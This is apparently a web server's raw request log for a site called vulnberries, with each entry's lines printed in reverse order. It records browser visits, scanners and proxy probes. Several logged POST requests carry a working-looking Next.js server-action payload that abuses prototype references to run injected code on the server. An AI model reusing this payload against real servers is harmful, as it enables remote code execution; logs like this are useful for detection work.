Referer: https://admin.vulnberries.ru/login
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53936
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 14:21:13] === HTTP Request ===
[2026-03-11 14:21:12] Login page accessed - IP: 172.30.0.12:53936
===================
X-Forwarded-Proto: https
X-Forwarded-For: 94.25.169.30
Sec-Fetch-Site: same-origin
Priority: u=0, i
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Referer: https://admin.vulnberries.ru/
Cookie: auth=sess_1773233005829118282; user_id=9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53936
Path: /login
URL: /login
Method: GET
[2026-03-11 14:21:12] === HTTP Request ===
===================
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
If-Modified-Since: Wed, 18 Feb 2026 18:50:14 GMT
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: script
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Priority: u=1
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 94.25.169.30
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53936
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-11 14:21:12] === HTTP Request ===
[2026-03-11 14:21:12] Main page accessed - IP: 172.30.0.12:53936
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=0, i
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-For: 94.25.169.30
Upgrade-Insecure-Requests: 1
Cookie: auth=sess_1773233005829118282; user_id=9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53936
Path: /
URL: /
Method: GET
[2026-03-11 14:21:12] === HTTP Request ===
[2026-03-11 13:52:46] Main page accessed - IP: 165.232.187.77:48360
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.232.187.77:48360
Path: /
URL: /
Method: GET
[2026-03-11 13:52:46] === HTTP Request ===
[2026-03-11 13:37:11] Main page accessed - IP: 152.42.204.253:56880
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.204.253:56880
Path: /
URL: /
Method: GET
[2026-03-11 13:37:11] === HTTP Request ===
===================
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:7318
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-11 13:32:16] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.143:37378
Query: ReturnUrl=%2flogin%3fredirectTo%3d%252Fdashboard&redirectTo=%2Fdashboard&AspxAutoDetectCookieSupport=1
Path: /Account/Login
URL: /Account/Login?ReturnUrl=%2flogin%3fredirectTo%3d%252Fdashboard&redirectTo=%2Fdashboard&AspxAutoDetectCookieSupport=1
Method: GET
[2026-03-11 12:43:09] === HTTP Request ===
[2026-03-11 12:29:45] Main page accessed - IP: 68.183.185.175:39006
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 68.183.185.175:39006
Path: /
URL: /
Method: GET
[2026-03-11 12:29:45] === HTTP Request ===
[2026-03-11 11:58:25] Main page accessed - IP: 34.76.111.153:44374
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.76.111.153:44374
Path: /
URL: /
Method: GET
[2026-03-11 11:58:25] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: proxyjudge.us
RemoteAddr: 165.227.165.2:18636
Path: /azenv.php
URL: http://proxyjudge.us/azenv.php
Method: GET
[2026-03-11 11:36:35] === HTTP Request ===
[2026-03-11 11:34:58] Main page accessed - IP: 157.245.109.134:42966
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 157.245.109.134:42966
Path: /
URL: /
Method: GET
[2026-03-11 11:34:58] === HTTP Request ===
[2026-03-11 11:18:10] Main page accessed - IP: 207.90.244.20:54136
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.20:54136
Path: /
URL: /
Method: GET
[2026-03-11 11:18:10] === HTTP Request ===
[2026-03-11 11:17:50] Main page accessed - IP: 167.172.90.204:33804
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.172.90.204:33804
Path: /
URL: /
Method: GET
[2026-03-11 11:17:50] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: proxyjudge.us
RemoteAddr: 207.154.217.154:31690
Path: /azenv.php
URL: http://proxyjudge.us/azenv.php
Method: GET
[2026-03-11 10:49:10] === HTTP Request ===
===================
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 65.49.1.201:62625
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-11 10:13:00] === HTTP Request ===
[2026-03-11 10:12:47] Main page accessed - IP: 65.49.1.195:19009
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 65.49.1.195:19009
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-11 10:12:47] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.197:38631
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 10:12:04] === HTTP Request ===
[2026-03-11 10:11:31] Main page accessed - IP: 65.49.1.192:27294
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.192:27294
Path: /
URL: /
Method: GET
[2026-03-11 10:11:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:51620
Path: /jars
URL: /jars
Method: GET
[2026-03-11 09:39:56] === HTTP Request ===
[2026-03-11 09:06:01] Main page accessed - IP: 152.42.204.253:41710
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.204.253:41710
Path: /
URL: /
Method: GET
[2026-03-11 09:06:01] === HTTP Request ===
[2026-03-11 09:02:23] Main page accessed - IP: 89.110.97.157:43996
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:43996
Path: /
URL: /
Method: GET
[2026-03-11 09:02:23] === HTTP Request ===
[2026-03-11 08:59:27] Main page accessed - IP: 157.245.96.91:42274
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 157.245.96.91:42274
Path: /
URL: /
Method: GET
[2026-03-11 08:59:27] === HTTP Request ===
===================
------WebKitFormBoundaryx328430031385--
------WebKitFormBoundaryx328430031385
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx328430031385
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 229593+true+1430488;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx328430031385
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_328430031385
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx328430031385
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54316
Path: /api/route
URL: /api/route
Method: POST
[2026-03-11 08:39:25] === HTTP Request ===
===================
------WebKitFormBoundaryx711851392279--
------WebKitFormBoundaryx711851392279
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx711851392279
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 183501+true+3879278;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx711851392279
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_711851392279
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx711851392279
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54310
Path: /app
URL: /app
Method: POST
[2026-03-11 08:39:25] === HTTP Request ===
===================
------WebKitFormBoundaryx1444582412549--
------WebKitFormBoundaryx1444582412549
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1444582412549
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 231979+true+6227212;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1444582412549
X-Nextjs-Html-Request-Id: ilovepoop_1444582412549
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1444582412549
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54294
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-11 08:39:25] === HTTP Request ===
===================
------WebKitFormBoundaryx2033101453993--
------WebKitFormBoundaryx2033101453993
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2033101453993
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 339864+true+5982103;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2033101453993
X-Nextjs-Html-Request-Id: ilovepoop_2033101453993
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2033101453993
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54292
Path: /api
URL: /api
Method: POST
[2026-03-11 08:39:25] === HTTP Request ===
===================
------WebKitFormBoundaryx918183247465--
------WebKitFormBoundaryx918183247465
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx918183247465
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 298266+true+3078404;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx918183247465
X-Nextjs-Html-Request-Id: ilovepoop_918183247465
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx918183247465
Next-Action: x
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54250
Path: /_next
URL: /_next
Method: POST
[2026-03-11 08:39:24] === HTTP Request ===
[2026-03-11 08:39:24] Main page accessed - IP: 195.3.221.86:54244
===================
------WebKitFormBoundaryx483521952505--
------WebKitFormBoundaryx483521952505
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx483521952505
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 162203+true+2980968;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx483521952505
X-Nextjs-Html-Request-Id: ilovepoop_483521952505
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx483521952505
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54244
Path: /
URL: /
Method: POST
[2026-03-11 08:39:24] === HTTP Request ===
===================
X-Forwarded-Proto: https
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5
X-Forwarded-For: 193.238.44.231
Dnt: 1
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=1, i
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://admin.vulnberries.ru/login
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34372
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 08:26:10] === HTTP Request ===
===================
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Dnt: 1
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 193.238.44.231
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://admin.vulnberries.ru/login
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: */*
X-Forwarded-Proto: https
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Priority: u=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34372
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-11 08:26:10] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 193.238.44.231
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Dnt: 1
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
Priority: u=1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34382
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-11 08:26:10] === HTTP Request ===
===================
X-Forwarded-For: 193.238.44.231
Sec-Fetch-Site: same-origin
Dnt: 1
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=0
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/css,*/*;q=0.1
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "Linux"
Via: 2.0 Caddy
Sec-Fetch-Dest: style
Referer: https://admin.vulnberries.ru/login
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34390
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-11 08:26:10] === HTTP Request ===
[2026-03-11 08:26:10] Login page accessed - IP: 172.30.0.12:34382
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Linux"
Priority: u=0, i
Dnt: 1
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 193.238.44.231
Sec-Fetch-Mode: navigate
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34382
Path: /login
URL: /login
Method: GET
[2026-03-11 08:26:10] === HTTP Request ===
[2026-03-11 08:25:56] Login page accessed - IP: 172.30.0.12:34382
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 149.154.161.234
Via: 2.0 Caddy
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Proto: https
Cookie: euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok; SOCS=CAISNQgEEitib3FfaWRlbnRpdHlmcm9udGVuZHVpc2VydmVyXzIwMjMwNzIzLjA5X3AwGgJlbiACGgYIgMSBpgY
Accept-Encoding: deflate, gzip, br
User-Agent: TelegramBot (like TwitterBot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34382
Path: /login
URL: /login
Method: GET
[2026-03-11 08:25:56] === HTTP Request ===
===================
X-Forwarded-For: 45.85.105.23
Via: 2.0 Caddy
Accept-Language: en-GB,en;q=0.9
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=3, i
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
User-Agent: NetworkingExtension/8623.2.7.10.4 Network/5569.82.5 iOS/26.3.1
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34372
Path: /apple-touch-icon.png
URL: /apple-touch-icon.png
Method: GET
[2026-03-11 08:25:45] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Language: en-GB,en;q=0.9
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.23
Priority: u=3, i
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: NetworkingExtension/8623.2.7.10.4 Network/5569.82.5 iOS/26.3.1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34390
Path: /apple-touch-icon-precomposed.png
URL: /apple-touch-icon-precomposed.png
Method: GET
[2026-03-11 08:25:45] === HTTP Request ===
===================
X-Forwarded-Proto: https
Priority: u=3, i
Accept-Language: en-GB,en;q=0.9
Accept: */*
User-Agent: NetworkingExtension/8623.2.7.10.4 Network/5569.82.5 iOS/26.3.1
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.23
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34382
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 08:25:45] === HTTP Request ===
[2026-03-11 08:25:42] Login page accessed - IP: 172.30.0.12:34390
===================
Priority: u=0, i
Accept-Language: en-GB,en;q=0.9
X-Forwarded-Host: admin.vulnberries.ru
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.3 Mobile/15E148 Safari/604.1
X-Forwarded-For: 45.85.105.23
Via: 2.0 Caddy
Sec-Fetch-Mode: navigate
Referer: https://admin.vulnberries.ru/
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34390
Path: /login
URL: /login
Method: GET
[2026-03-11 08:25:42] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.3 Mobile/15E148 Safari/604.1
Priority: u=1, i
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.23
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
X-Forwarded-Proto: https
Sec-Fetch-Dest: script
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34390
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-11 08:25:41] === HTTP Request ===
===================
Referer: https://admin.vulnberries.ru/
Accept-Language: en-GB,en;q=0.9
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.3 Mobile/15E148 Safari/604.1
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-For: 45.85.105.23
Priority: u=1, i
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34372
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-11 08:25:41] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.23
Accept-Language: en-GB,en;q=0.9
X-Forwarded-Proto: https
Sec-Fetch-Dest: style
Accept: text/css,*/*;q=0.1
Sec-Fetch-Mode: no-cors
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
Priority: u=1, i
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.3 Mobile/15E148 Safari/604.1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34372
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-11 08:25:41] === HTTP Request ===
[2026-03-11 08:25:41] Main page accessed - IP: 172.30.0.12:34372
===================
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.3 Mobile/15E148 Safari/604.1
X-Forwarded-Host: admin.vulnberries.ru
